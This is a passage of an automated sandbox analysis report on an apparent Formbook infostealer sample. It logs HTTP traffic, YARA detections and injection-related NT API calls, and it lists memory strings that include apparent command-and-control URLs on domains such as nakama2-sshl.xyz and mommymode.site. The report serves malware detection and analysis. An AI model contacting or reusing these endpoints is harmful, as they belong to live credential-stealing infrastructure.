19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df 
ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:20:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df 
ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:29 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:32 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:34 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:37 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:20:57 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:21:00 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:21:03 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 12:21:05 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Wed, 09 Oct 2024 12:21:12 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Wed, 09 Oct 2024 12:21:15 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Wed, 09 Oct 2024 12:21:18 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Wed, 09 Oct 2024 12:21:20 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 693 connection: close Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 09 Oct 2024 12:21:40 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 09 Oct 2024 12:21:43 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 09 Oct 2024 12:21:48 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 12:21:54 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 12:21:57 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 09 Oct 2024 12:21:59 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000004CDC000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000042AC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://mommymode.site/hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n
            Source: RmClient.exe, 00000006.00000002.4131092895.00000000041DE000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000037AE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://nakama2-sshl.xyz/ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000003A04000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.0000000002FD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2262378691.000000003C114000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://newdaydawning.net/7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLM
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4132186238.0000000005091000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.polarmuseum.info
            Source: ifhdPMDeORMlb.exe, 00000007.00000002.4132186238.0000000005091000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.polarmuseum.info/nuqv/
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RmClient.exe, 00000006.00000002.4131092895.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.00000000032F8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RmClient.exe, 00000006.00000002.4129491056.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RmClient.exe, 00000006.00000003.2148482181.0000000007869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RmClient.exe, 00000006.00000002.4132961657.000000000788E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: RmClient.exe, 00000006.00000002.4132858063.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4131092895.0000000004E6E000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.000000000443E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com

            E-Banking Fraud

            Source: Yara match File source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_0268C433 NtClose,1_2_0268C433
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03074340 NtSetContextThread,1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03073090 NtSetValueKey,1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03074650 NtSuspendThread,1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072F30 NtCreateSection,1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03073D70 NtOpenThread,1_2_03073D70
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072C60 NtCreateKey,1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03064340 NtSetContextThread,LdrInitializeThunk,6_2_03064340
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03064650 NtSuspendThread,LdrInitializeThunk,6_2_03064650
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_030635C0 NtCreateMutant,LdrInitializeThunk,6_2_030635C0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062B60 NtClose,LdrInitializeThunk,6_2_03062B60
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03062BA0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03062BE0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03062BF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062AD0 NtReadFile,LdrInitializeThunk,6_2_03062AD0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062AF0 NtWriteFile,LdrInitializeThunk,6_2_03062AF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_030639B0 NtGetContextThread,LdrInitializeThunk,6_2_030639B0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062F30 NtCreateSection,LdrInitializeThunk,6_2_03062F30
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062FB0 NtResumeThread,LdrInitializeThunk,6_2_03062FB0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062FE0 NtCreateFile,LdrInitializeThunk,6_2_03062FE0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03062E80
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03062EE0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03062D10
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03062D30
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062DD0 NtDelayExecution,LdrInitializeThunk,6_2_03062DD0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03062DF0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062C60 NtCreateKey,LdrInitializeThunk,6_2_03062C60
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03062C70
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03062CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03062CA0
            Source: C:\Windows\SysWOW64\RmClient.exe, Code function: 6_2_03063010 NtOpenDirectoryObject,6_2_03063010
